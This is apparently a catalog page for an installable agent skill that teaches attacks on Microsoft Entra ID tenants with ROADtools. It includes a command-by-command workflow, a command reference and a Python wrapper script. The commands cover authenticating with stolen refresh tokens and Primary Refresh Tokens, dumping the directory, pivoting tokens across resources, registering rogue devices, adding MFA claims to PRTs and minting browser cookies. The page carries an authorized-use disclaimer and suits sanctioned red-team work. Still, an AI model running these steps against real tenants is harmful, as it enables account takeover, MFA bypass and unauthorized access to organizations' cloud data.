identity access management

Attacking Entra ID with ROADtools

Enumerate Entra ID with ROADrecon and acquire and exchange tokens with roadtx.

azure-adcloud-enumerationentra-ididentity-attackprimary-refresh-tokenred-teamroadtoolstoken-manipulation
Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-Skills
Framework mappings

Authorized use only: ROADtools interacts with live Microsoft Entra ID (Azure AD) tenants and can register devices, mint and exchange tokens, and enumerate directory objects. Use it solely against tenants you own or are explicitly authorized in writing to test. Unauthorized access to a cloud tenant is illegal.

Overview

ROADtools (by Dirk-jan Mollema) is the de facto offensive toolkit for Microsoft Entra ID. It has two main components:

  • ROADrecon — authenticates to Entra ID, gathers the full directory into a local SQLite database via the Azure AD Graph API, and serves an Angular GUI to explore users, groups, roles, applications, service principals, conditional-access policies, and device objects offline. A plugin system exports to BloodHound and analyzes CA policies.
  • roadtx (ROADtools Token eXchange) — acquires and exchanges Entra-issued tokens across the many OAuth flows (ROPC, device code, auth-code, refresh-token exchange, app/federated app), performs device registration, and handles Primary Refresh Token (PRT) operations including PRT-based SSO and cookie minting. Its FOCI (Family of Client IDs) awareness lets a refresh token for one first-party client be redeemed for another resource.

Together they cover the Discovery phase against cloud identity: enumerate the tenant (T1087.004 Account Discovery: Cloud Account) and obtain/manipulate the tokens needed to reach Microsoft Graph, Azure Resource Manager, and other resources. ROADrecon's offline database makes recon stealthy and fast; roadtx makes token theft, PRT abuse, and cross-resource pivoting practical.

When to Use

  • During an authorized Azure / Entra ID red-team or cloud penetration test.
  • When you have a foothold credential, refresh token, or PRT and need to enumerate the tenant.
  • When you must pivot a token from one resource (e.g., Azure CLI) to another (e.g., Microsoft Graph).
  • When validating that conditional-access, device-compliance, and token controls actually constrain an attacker.
  • When mapping Entra attack paths (export to BloodHound for graph analysis).

Prerequisites

  • Written authorization and defined scope for the target tenant.
  • A starting credential: username/password (no MFA flows), a device code session, a refresh/access token, or a registered device's PRT.
  • Python 3.7+ (roadtx Selenium flows need a matching geckodriver/Firefox).
# Core install (roadlib is a shared dependency, pulled in automatically)
python -m pip install roadrecon
python -m pip install roadtx
# Verify
roadrecon --help
roadtx --help

Objectives

  • Authenticate to Entra ID via the appropriate flow (device code preferred for MFA).
  • Gather the full directory with ROADrecon and analyze it in the GUI.
  • Export the directory to BloodHound and run CA-policy analysis plugins.
  • Acquire tokens with roadtx and exchange refresh tokens across resources/clients.
  • Demonstrate PRT-based SSO and document the resulting access.

MITRE ATT&CK Mapping

ID Tactic Official Technique Name Role in this skill
T1087.004 Discovery Account Discovery: Cloud Account ROADrecon enumerates tenant users/accounts
T1069.003 Discovery Permission Groups Discovery: Cloud Groups ROADrecon enumerates Entra groups and roles
T1538 Discovery Cloud Service Dashboard GUI exploration of tenant configuration
T1550.001 Defense Evasion / Lateral Movement Use Alternate Authentication Material: Application Access Token roadtx refresh-token exchange across resources
T1528 Credential Access Steal Application Access Token roadtx PRT/token acquisition

Workflow

Step 1: Authenticate with ROADrecon

Pick the flow that matches your foothold. Device code supports MFA; ROPC (-u/-p) does not.

# Username/password (legacy, no MFA)
roadrecon auth -u user@tenant.onmicrosoft.com -p 'Password123!'
 
# Device-code flow (supports MFA)
roadrecon auth --device-code
 
# From a stolen access or refresh token
roadrecon auth --access-token <JWT>
roadrecon auth --refresh-token <refresh_token>
 
# From a PRT (with session key) for SSO-grade access
roadrecon auth --prt <prt> --prt-sessionkey <session_key>

Authentication writes .roadtools_auth in the working directory.

Step 2: Gather the directory

# Full gather into roadrecon.db (default)
roadrecon gather
 
# Include MFA/auth-method details (requires a privileged role)
roadrecon gather --mfa

Step 3: Explore in the GUI

roadrecon gui
# Browse to http://127.0.0.1:5000 — users, groups, roles, applications,
# service principals, devices, and conditional-access policies, all offline.

Step 4: Run analysis plugins

# Analyze conditional-access policies
roadrecon plugin policies -h
roadrecon plugin policies
 
# Export the gathered data to a BloodHound-importable format
roadrecon plugin bloodhound -h
roadrecon plugin bloodhound

Step 5: Acquire tokens with roadtx

# ROPC: get a Microsoft Graph token for the Azure CLI client
roadtx gettokens -u user@tenant.com -p 'Password123!' -c azcli -r msgraph
 
# Device-code style interactive auth for the Teams client to Graph
roadtx interactiveauth -c msteams -r msgraph
 
# From an existing refresh token
roadtx gettokens --refresh-token <refresh_token> -r msgraph

Tokens are written to .roadtools_auth (use --tokens-stdout to print).

Step 6: Exchange refresh tokens across resources (FOCI pivot)

A FOCI refresh token obtained for one first-party client can be redeemed for another resource without re-auth.

# Convert the stored refresh token to an Azure Resource Manager token
roadtx refreshtokento -r azrm
 
# Convert to a scoped Graph token via the Teams client
roadtx refreshtokento -c msteams -r msgraph
 
# Find which first-party clients hold a given scope
roadtx getscope -s https://graph.microsoft.com/mail.read --foci

Step 7: Device registration and PRT-based SSO

# Register a (virtual) device to the tenant
roadtx device -n redteam-device
 
# Request a PRT using the device cert/key and user creds
roadtx prt -u user@tenant.com -p 'Password123!' --key-pem redteam-device.key --cert-pem redteam-device.pem
 
# Use the PRT to authenticate a client to a resource (SSO-grade)
roadtx prtauth -c msteams -r msgraph
 
# Enrich a PRT with an interactive MFA claim
roadtx prtenrich -u user@tenant.com

Step 8: Inspect tokens

# Decode and print claims of the stored / a supplied token
roadtx describe -t <JWT>
roadtx describe < .roadtools_auth | jq .

Tools and Resources

Tool Purpose Primary Source
ROADtools (repo) Toolkit overview + wiki https://github.com/dirkjanm/ROADtools
ROADrecon wiki Auth/gather/gui/plugin usage https://github.com/dirkjanm/ROADtools/wiki/Getting-started-with-ROADrecon
roadtx wiki Token exchange + PRT/device flows https://github.com/dirkjanm/ROADtools/wiki/ROADtools-Token-eXchange-(roadtx)
BloodHound CE Graph analysis of exported Entra data https://github.com/SpecterOps/BloodHound
Microsoft identity platform Token/flow reference https://learn.microsoft.com/entra/identity-platform/

Validation Criteria

  • Authenticated to the target tenant via an authorized flow; .roadtools_auth created.
  • Directory gathered into roadrecon.db (with --mfa where role allows).
  • GUI explored; users, groups, roles, apps, CA policies reviewed.
  • CA-policy and BloodHound plugins executed; data exported.
  • Tokens acquired with roadtx for at least one resource.
  • Refresh-token exchange to a second resource demonstrated (FOCI pivot).
  • Device registered and PRT-based SSO demonstrated (where in scope).
  • Token claims inspected with roadtx describe.
  • Findings and access documented for the engagement report.
Source materials

References and resources

Everything below is rendered for inspection. Script files are read-only and never run.

References 2

api-reference.md3.0 KB

ROADtools Command Reference

ROADrecon

Command Purpose Key flags
roadrecon auth Authenticate to Entra ID -u user, -p password, --device-code, --access-token, --refresh-token, --prt, --prt-sessionkey, --prt-cookie, --prt-init
roadrecon gather Gather directory into roadrecon.db --mfa (needs privileged role)
roadrecon gui Launch Angular GUI (http://127.0.0.1:5000)
roadrecon plugin policies Analyze conditional-access policies -f file, -p
roadrecon plugin bloodhound Export to BloodHound format

Auth state is stored in .roadtools_auth; directory data in roadrecon.db.

roadtx (ROADtools Token eXchange)

Token acquisition

Command Purpose Key flags
roadtx gettokens Acquire tokens (ROPC / refresh) -u, -p, -c client, -r resource, -s scope, --refresh-token, --cae, --tokens-stdout
roadtx interactiveauth Interactive (browser) auth -u, -p, -c, -r, -ru redirect-url
roadtx codeauth Exchange auth code for tokens
roadtx refreshtokento Convert stored RT to another resource -r, -s, -c
roadtx appauth App (client-credential) auth -c, -p secret, -t tenant, -r, -s, --cert-pem, --key-pem, --cert-pfx, --pfx-pass
roadtx federatedappauth Federated app auth (workload identity) -c, --cert-pem, --key-pem, --subject, -t, --issuer, -s, --kid

Device + PRT

Command Purpose Key flags
roadtx device Register/delete a device -n name, -a action, -c cert, -k key
roadtx hybriddevice Register hybrid-joined device
roadtx prt Request/renew a PRT -u, -p, --key-pem, --cert-pem, -a action, -r refresh-token
roadtx prtauth Auth a client using a PRT -c, -r, -f prt-file, --prt, --prt-sessionkey, --tokens-stdout
roadtx browserprtauth Browser auth using PRT -url, -c, -r, -f
roadtx browserprtinject Inject PRT compliance claims -u, -r, -c
roadtx prtenrich Add MFA claim to PRT -u
roadtx prtcookie Mint browser cookie from PRT

Utility

Command Purpose Key flags
roadtx describe Decode token claims -t token (or stdin)
roadtx decrypt Decrypt JWE tokens
roadtx getscope Find clients holding a scope -s, --foci
roadtx getotp Generate TOTP from a seed <seed>
roadtx listaliases List client/resource aliases
roadtx keepassauth Selenium auth from KeePass -c, -u, -kp, -kpp, -url, --keep-open
roadtx sharepointlogin Authenticate to SharePoint/OneDrive <token>, --host

Common client (-c) and resource (-r) aliases

Clients: azcli, msteams, msgraph (as client where applicable), office, broker. Resources: msgraph, azrm, aadgraph, devicereg. Use roadtx listaliases for the full list.

standards.md1.4 KB

Standards and Framework Mapping

NIST Cybersecurity Framework 2.0

ID Name Rationale
ID.AM-03 Representations of the organization's authorized network communication and internal/external network data flows are maintained ROADrecon enumeration produces the directory/identity asset inventory that defenders must maintain and that attackers exploit; the engagement validates visibility of this asset surface.

MITRE ATT&CK (Enterprise)

ID Name Rationale
T1087.004 Account Discovery: Cloud Account ROADrecon enumerates Entra ID user/account objects.
T1069.003 Permission Groups Discovery: Cloud Groups ROADrecon enumerates Entra groups and directory roles.
T1538 Cloud Service Dashboard GUI exploration of tenant configuration and policies.
T1550.001 Use Alternate Authentication Material: Application Access Token roadtx refresh-token exchange across resources (FOCI).
T1528 Steal Application Access Token roadtx token/PRT acquisition.

Reference standards

Standard Relevance
Microsoft identity platform (OAuth 2.0 / OIDC) Defines the auth-code, ROPC, device-code, and refresh-token flows roadtx exercises.
FOCI (Family of Client IDs) Microsoft first-party client family enabling cross-client refresh-token redemption.
Primary Refresh Token (PRT) Device-bound SSO artifact abused via roadtx prt/prtauth.

Scripts 1

agent.py4.8 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
"""ROADtools engagement orchestrator.

Authorized Entra ID assessment helper. Wraps the real roadrecon/roadtx binaries
to run an authenticated recon pass and a token-exchange pivot, then parses token
claims. Requires `roadrecon` and `roadtx` on PATH (pip install roadrecon roadtx).

Examples
--------
    python agent.py recon --device-code --gather --bloodhound
    python agent.py recon -u user@tenant.com -p 'Pass!' --gather
    python agent.py tokens -u user@tenant.com -p 'Pass!' -c azcli -r msgraph
    python agent.py pivot -r azrm          # exchange stored RT to ARM
    python agent.py describe                # decode .roadtools_auth token
"""
import argparse
import json
import shutil
import subprocess
import sys


def require(binary):
    if shutil.which(binary) is None:
        sys.exit(f"[!] '{binary}' not found on PATH. Install with: pip install {binary}")


def run(cmd):
    print("[>] " + " ".join(cmd), file=sys.stderr)
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True)
    except FileNotFoundError as exc:
        sys.exit(f"[!] failed to execute {cmd[0]}: {exc}")
    if proc.stdout:
        print(proc.stdout)
    if proc.returncode != 0:
        print(proc.stderr, file=sys.stderr)
        print(f"[!] {cmd[0]} exited {proc.returncode}", file=sys.stderr)
    return proc.returncode, proc.stdout


def auth_args(args):
    if args.device_code:
        return ["--device-code"]
    if args.access_token:
        return ["--access-token", args.access_token]
    if args.refresh_token:
        return ["--refresh-token", args.refresh_token]
    if args.user and args.password:
        return ["-u", args.user, "-p", args.password]
    sys.exit("[!] provide an auth method: --device-code | --access-token | --refresh-token | -u/-p")


def cmd_recon(args):
    require("roadrecon")
    rc, _ = run(["roadrecon", "auth"] + auth_args(args))
    if rc != 0:
        sys.exit("[!] authentication failed")
    if args.gather:
        gather = ["roadrecon", "gather"]
        if args.mfa:
            gather.append("--mfa")
        run(gather)
    if args.bloodhound:
        run(["roadrecon", "plugin", "bloodhound"])
    if args.policies:
        run(["roadrecon", "plugin", "policies"])
    print("[+] recon complete. Run 'roadrecon gui' to explore roadrecon.db", file=sys.stderr)


def cmd_tokens(args):
    require("roadtx")
    cmd = ["roadtx", "gettokens"]
    if args.refresh_token:
        cmd += ["--refresh-token", args.refresh_token]
    elif args.user and args.password:
        cmd += ["-u", args.user, "-p", args.password]
    else:
        sys.exit("[!] provide -u/-p or --refresh-token")
    if args.client:
        cmd += ["-c", args.client]
    if args.resource:
        cmd += ["-r", args.resource]
    run(cmd)


def cmd_pivot(args):
    require("roadtx")
    cmd = ["roadtx", "refreshtokento", "-r", args.resource]
    if args.client:
        cmd += ["-c", args.client]
    run(cmd)


def cmd_describe(args):
    require("roadtx")
    if args.token:
        run(["roadtx", "describe", "-t", args.token])
    else:
        # roadtx describe reads .roadtools_auth from stdin
        try:
            with open(".roadtools_auth", "r", encoding="utf-8") as fh:
                data = fh.read()
        except FileNotFoundError:
            sys.exit("[!] .roadtools_auth not found; authenticate first or pass --token")
        proc = subprocess.run(["roadtx", "describe"], input=data, text=True,
                              capture_output=True)
        print(proc.stdout or proc.stderr)


def main():
    p = argparse.ArgumentParser(description="ROADtools engagement orchestrator (authorized use only)")
    sub = p.add_subparsers(dest="cmd", required=True)

    def add_auth(sp):
        sp.add_argument("-u", "--user"); sp.add_argument("-p", "--password")
        sp.add_argument("--device-code", action="store_true")
        sp.add_argument("--access-token"); sp.add_argument("--refresh-token")

    sr = sub.add_parser("recon"); add_auth(sr)
    sr.add_argument("--gather", action="store_true")
    sr.add_argument("--mfa", action="store_true")
    sr.add_argument("--bloodhound", action="store_true")
    sr.add_argument("--policies", action="store_true")

    st = sub.add_parser("tokens")
    st.add_argument("-u", "--user"); st.add_argument("-p", "--password")
    st.add_argument("--refresh-token")
    st.add_argument("-c", "--client", default="azcli")
    st.add_argument("-r", "--resource", default="msgraph")

    sp_ = sub.add_parser("pivot")
    sp_.add_argument("-r", "--resource", required=True)
    sp_.add_argument("-c", "--client")

    sd = sub.add_parser("describe"); sd.add_argument("--token")

    args = p.parse_args()
    {"recon": cmd_recon, "tokens": cmd_tokens,
     "pivot": cmd_pivot, "describe": cmd_describe}[args.cmd](args)


if __name__ == "__main__":
    main()
Keep exploring